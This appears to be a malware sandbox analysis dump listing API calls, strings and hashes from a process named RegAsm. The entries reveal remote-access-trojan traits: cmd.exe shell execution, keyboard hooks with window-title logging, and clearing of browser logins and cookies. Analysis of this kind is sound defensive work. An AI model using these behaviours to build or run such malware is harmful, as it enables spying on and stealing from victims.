                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseCreateValue
                                                                                  • String ID: pth_unenc
                                                                                  • API String ID: 1818849710-4028850238
                                                                                  • Opcode ID: 5c236e770f027b7b6dfc699725bd7ba66defa52264e3e321846078cfa9e8a7ba
                                                                                  • Instruction ID: 9133f253890910ff78e8f434c24b82038cc7026402723a24ca4ec17c3e6d8cb5
                                                                                  • Opcode Fuzzy Hash: 5c236e770f027b7b6dfc699725bd7ba66defa52264e3e321846078cfa9e8a7ba
                                                                                  • Instruction Fuzzy Hash: 15F0C271440218FBCF00AFA1EC45FEE376CEF00756F10452AF905A61A1E7759E04DA94
                                                                                  APIs
                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFEC
                                                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040E02B
                                                                                    • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 004356EC
                                                                                    • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 00435710
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E051
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                                  • String ID: bad locale name
                                                                                  • API String ID: 3628047217-1405518554
                                                                                  • Opcode ID: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                                                                                  • Instruction ID: 7f9ccd90240ef42149755af47b5df127ed13e8783c268b42739d505c0e35a915
                                                                                  • Opcode Fuzzy Hash: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                                                                                  • Instruction Fuzzy Hash: 77F08131544A085AC338FA62D863DDA73B49F14358F50457FB406268D2EF78BA0CCA9D
                                                                                  APIs
                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0001D4EE,00000000,00000000,00000000), ref: 00416C82
                                                                                  • ShowWindow.USER32(00000009), ref: 00416C9C
                                                                                  • SetForegroundWindow.USER32 ref: 00416CA8
                                                                                    • Part of subcall function 0041CE2C: AllocConsole.KERNEL32(00475338), ref: 0041CE35
                                                                                    • Part of subcall function 0041CE2C: GetConsoleWindow.KERNEL32 ref: 0041CE3B
                                                                                    • Part of subcall function 0041CE2C: ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                                                    • Part of subcall function 0041CE2C: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Window$Console$Show$AllocCreateForegroundOutputThread
                                                                                  • String ID: !D@
                                                                                  • API String ID: 186401046-604454484
                                                                                  • Opcode ID: 66a4db702971166e51169c96c42166a39a03490b62fdad1c1d9be1af324f9392
                                                                                  • Instruction ID: 9f5213224becab59645eda34593d96b16d6ada18beeab21aaf628210512d7754
                                                                                  • Opcode Fuzzy Hash: 66a4db702971166e51169c96c42166a39a03490b62fdad1c1d9be1af324f9392
                                                                                  • Instruction Fuzzy Hash: ECF05E70149340EAD720AB62ED45AFA7B69EB54341F01487BF909C20F2DB389C94865E
                                                                                  APIs
                                                                                  • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041616B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExecuteShell
                                                                                  • String ID: /C $cmd.exe$open
                                                                                  • API String ID: 587946157-3896048727
                                                                                  • Opcode ID: 6b954565fb865431a8f0571ad86dfb8a094b841cbf93f4f8f4d3cab274959172
                                                                                  • Instruction ID: 08f4dee505367bf09000beb2be63de5ecd082ae46aa0e0363999309db21c3e05
                                                                                  • Opcode Fuzzy Hash: 6b954565fb865431a8f0571ad86dfb8a094b841cbf93f4f8f4d3cab274959172
                                                                                  • Instruction Fuzzy Hash: 5EE0C0B0204305ABC605F675DC96CBF73ADAA94749B50483F7142A20E2EF7C9D49C65D
                                                                                  APIs
                                                                                  • TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
                                                                                  • UnhookWindowsHookEx.USER32(004750F0), ref: 0040B902
                                                                                  • TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: TerminateThread$HookUnhookWindows
                                                                                  • String ID: pth_unenc
                                                                                  • API String ID: 3123878439-4028850238
                                                                                  • Opcode ID: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                                                                                  • Instruction ID: 372ac16de24f92ae7b862ff59389ff52a9cc8b3ac2037ffe6dc6d1e564519698
                                                                                  • Opcode Fuzzy Hash: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                                                                                  • Instruction Fuzzy Hash: 71E01272204315EFD7201F909C888667AADEE1539632409BEF6C261BB6CB7D4C54C79D
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressHandleModuleProc
                                                                                  • String ID: GetCursorInfo$User32.dll
                                                                                  • API String ID: 1646373207-2714051624
                                                                                  • Opcode ID: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                                                                  • Instruction ID: 8b26e8b19aea132afe7ec2793fcae50f4a2deac5c44528798ee909e27cd98dc2
                                                                                  • Opcode Fuzzy Hash: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                                                                  • Instruction Fuzzy Hash: 6BB092B4981740FB8F102BB0AE4EA193A25B614703B1008B6F046961A2EBB888009A2E
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014B9
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressLibraryLoadProc
                                                                                  • String ID: GetLastInputInfo$User32.dll
                                                                                  • API String ID: 2574300362-1519888992
                                                                                  • Opcode ID: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                                                                                  • Instruction ID: d02e03e3b89f99dad65f23c179d95e13f318a7fd709defe56253aab8848571e2
                                                                                  • Opcode Fuzzy Hash: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                                                                                  • Instruction Fuzzy Hash: EFB092B8580300FBCB102FA0AD4E91E3A68AA18703B1008A7F441C21A1EBB888009F5F
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: __alldvrm$_strrchr
                                                                                  • String ID:
                                                                                  • API String ID: 1036877536-0
                                                                                  • Opcode ID: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                                                                  • Instruction ID: 8ce1af842cd152cb2b2428f5d584a25f6c9224aafe101b92c03b71ca88d34985
                                                                                  • Opcode Fuzzy Hash: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                                                                  • Instruction Fuzzy Hash: 87A156729846829FF721CF58C8817AEBBA5FF15314F2841AFE8859B381D27C8C51C75A
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free
                                                                                  • String ID:
                                                                                  • API String ID: 269201875-0
                                                                                  • Opcode ID: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                                                                                  • Instruction ID: 6f8591e81a910498abf0b0e408487d1c0faf04506bf4bd3dd9e850377c22d226
                                                                                  • Opcode Fuzzy Hash: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                                                                                  • Instruction Fuzzy Hash: 34413931B00104AAEB207B7A9C4666F3AB5DF45735F570A1FFD28C7293DA7C481D426A
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                                                  • Instruction ID: b0a34e1ed6630e1fb57c9e62860a3601010315cd62f19612bff23542d182db60
                                                                                  • Opcode Fuzzy Hash: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                                                  • Instruction Fuzzy Hash: 70412AB1600704BFE724AF79CD41B5EBBE8EB88714F10462FF145DB281E3B999058798
                                                                                  APIs
                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,10006FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 10008731
                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 100087BA
                                                                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 100087CC
                                                                                  • __freea.LIBCMT ref: 100087D5
                                                                                    • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4546320120.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4546280163.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4546320120.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                  • String ID:
                                                                                  • API String ID: 2652629310-0
                                                                                  • Opcode ID: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                                  • Instruction ID: 5b9b35b0a4db414dac5c81271493033b4f2f0f3dd9b893eeefd60fa04c8ec889
                                                                                  • Opcode Fuzzy Hash: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                                  • Instruction Fuzzy Hash: 2731AE32A0021AABEF15CF64CC85EAF7BA5EF44290F214129FC48D7158EB35DE50CBA0
                                                                                  APIs
                                                                                  Strings
                                                                                  • Cleared browsers logins and cookies., xrefs: 0040C130
                                                                                  • [Cleared browsers logins and cookies.], xrefs: 0040C11F
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Sleep
                                                                                  • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                                  • API String ID: 3472027048-1236744412
                                                                                  • Opcode ID: af2c2d963010d4b9fe0ed32b7540b86f028afa125e63126aea6004068ef018c7
                                                                                  • Instruction ID: 5a72b8a34604a64e244bad04561a930bad76f77e78bf22f3e088d6afb7384554
                                                                                  • Opcode Fuzzy Hash: af2c2d963010d4b9fe0ed32b7540b86f028afa125e63126aea6004068ef018c7
                                                                                  • Instruction Fuzzy Hash: A431A805648381EDD6116BF514967AB7B824A53748F0882BFB8C4373C3DA7A4808C79F
                                                                                  APIs
                                                                                  • EnumDisplayMonitors.USER32(00000000,00000000,0041960A,00000000), ref: 00419530
                                                                                  • EnumDisplayDevicesW.USER32(?), ref: 00419560
                                                                                  • EnumDisplayDevicesW.USER32(?,?,?,00000000), ref: 004195D5
                                                                                  • EnumDisplayDevicesW.USER32(00000000,00000000,?,00000000), ref: 004195F2
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: DisplayEnum$Devices$Monitors
                                                                                  • String ID:
                                                                                  • API String ID: 1432082543-0
                                                                                  • Opcode ID: 307544a1efd678830df2dab17394228d9bd71c3d3133ae3f2bbfdbf915fafe35
                                                                                  • Instruction ID: 2d7c1ce958f8de7f9ce17d43b909e87ea7509c435c2805f0bc90a8abde121c81
                                                                                  • Opcode Fuzzy Hash: 307544a1efd678830df2dab17394228d9bd71c3d3133ae3f2bbfdbf915fafe35
                                                                                  • Instruction Fuzzy Hash: 232180721083146BD221DF26DC89EABBBECEBD1754F00053FF45AD3190EB749A49C66A
                                                                                  APIs
                                                                                    • Part of subcall function 0041C5E2: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041C5F2
                                                                                    • Part of subcall function 0041C5E2: GetWindowTextLengthW.USER32(00000000), ref: 0041C5FB
                                                                                    • Part of subcall function 0041C5E2: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041C625
                                                                                  • Sleep.KERNEL32(000001F4), ref: 0040A5AE
                                                                                  • Sleep.KERNEL32(00000064), ref: 0040A638
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Window$SleepText$ForegroundLength
                                                                                  • String ID: [ $ ]
                                                                                  • API String ID: 3309952895-93608704
                                                                                  • Opcode ID: f02f1a0373de4d905e268f57495fa08b349ea431ac4d969b5d726f466b44a1dd
                                                                                  • Instruction ID: 6255842b65d5da3793f092b3f1447ea5db7efb23f61c0c2d19f8aa6a86066f85
                                                                                  • Opcode Fuzzy Hash: f02f1a0373de4d905e268f57495fa08b349ea431ac4d969b5d726f466b44a1dd
                                                                                  • Instruction Fuzzy Hash: CB119F315143006BC614BB26CC579AF77A8AB90348F40083FF552661E3EF79AE18869B
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: SystemTimes$Sleep__aulldiv
                                                                                  • String ID:
                                                                                  • API String ID: 188215759-0
                                                                                  • Opcode ID: 32d4930cb2be9b30136c829dd369e4a23351f3455ccfda4be26c85d87a7cef4d
                                                                                  • Instruction ID: 634937a4cd8d43e921f59083ecd148feda9109121ee8127270144c35be039893
                                                                                  • Opcode Fuzzy Hash: 32d4930cb2be9b30136c829dd369e4a23351f3455ccfda4be26c85d87a7cef4d
                                                                                  • Instruction Fuzzy Hash: D01133B35043456BC304EAB5CD85DEF779CEBC4358F040A3EF64982061EE29E94986A6
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: fcebbc467d131149bede3708c03e30a5933a8f2bf6fa192c1d79c37d30f8ae05
                                                                                  • Instruction ID: 2af8e1c260e5220142bf0b5f8a7e988c949d9a3a1697e0ff4d6bcf25ce69da1b
                                                                                  • Opcode Fuzzy Hash: fcebbc467d131149bede3708c03e30a5933a8f2bf6fa192c1d79c37d30f8ae05
                                                                                  • Instruction Fuzzy Hash: 7E01F2B26093557EFA202E786CC2F67630DCB51FBAB31033BB520612D2DB68DD40452C
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d36049e99d51c5662ea1cdccde7f001ca18baa555cb14a41c95be32ad22d597f
                                                                                  • Instruction ID: 437de9af4247593539f95cdbb70b1dc5411192884b5f12beac7b10196549b189
                                                                                  • Opcode Fuzzy Hash: d36049e99d51c5662ea1cdccde7f001ca18baa555cb14a41c95be32ad22d597f
                                                                                  • Instruction Fuzzy Hash: CB01ADB26096527ABA202E796CC5E27634CDB42BBA335037BF821512E3DF68DE054169
                                                                                  APIs
                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,10001D66,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue), ref: 10005D13
                                                                                  • GetLastError.KERNEL32(?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8), ref: 10005D1F
                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000), ref: 10005D2D
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4546320120.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4546280163.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4546320120.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                  • String ID:
                                                                                  • API String ID: 3177248105-0
                                                                                  • Opcode ID: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                                  • Instruction ID: ab8c2af688280ff547417c348c7c3430721907d0b6a0cc88e9d35c15e8af339b
                                                                                  • Opcode Fuzzy Hash: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                                  • Instruction Fuzzy Hash: 59018436615732ABE7319B689C8CB4B7798EF056E2B214623F909D7158D731D801CAE0
                                                                                  APIs
                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue), ref: 00448618
                                                                                  • GetLastError.KERNEL32(?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367), ref: 00448624
                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000), ref: 00448632
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                  • String ID:
                                                                                  • API String ID: 3177248105-0
                                                                                  • Opcode ID: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                                                                  • Instruction ID: 239c22332ac31c5199b3ba4764290be2907fca328f5d1df1ca03bb1201a614b6
                                                                                  • Opcode Fuzzy Hash: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                                                                  • Instruction Fuzzy Hash: D401FC32602322EBDB618A78EC4495F7758AF15BA2B22093AF909D3241DF24DC01C6EC
                                                                                  APIs
                                                                                  • ___BuildCatchObject.LIBVCRUNTIME ref: 004398FA
                                                                                    • Part of subcall function 00439F32: ___AdjustPointer.LIBCMT ref: 00439F7C
                                                                                  • _UnwindNestedFrames.LIBCMT ref: 00439911
                                                                                  • ___FrameUnwindToState.LIBVCRUNTIME ref: 00439923
                                                                                  • CallCatchBlock.LIBVCRUNTIME ref: 00439947
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                  • String ID:
                                                                                  • API String ID: 2633735394-0
                                                                                  • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                                  • Instruction ID: 1eef882e9718bbd9a0ab38cd68ce054dbb3f9d4064fa539f417e17899f1f7293
                                                                                  • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                                  • Instruction Fuzzy Hash: 38010532000109BBCF125F56CC01EDA3BAAEF5C754F05901AF95865221C3BAE862ABA4
                                                                                  APIs
                                                                                  • GetSystemMetrics.USER32(0000004C), ref: 0041942B
                                                                                  • GetSystemMetrics.USER32(0000004D), ref: 00419431
                                                                                  • GetSystemMetrics.USER32(0000004E), ref: 00419437
                                                                                  • GetSystemMetrics.USER32(0000004F), ref: 0041943D
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: MetricsSystem
                                                                                  • String ID:
                                                                                  • API String ID: 4116985748-0
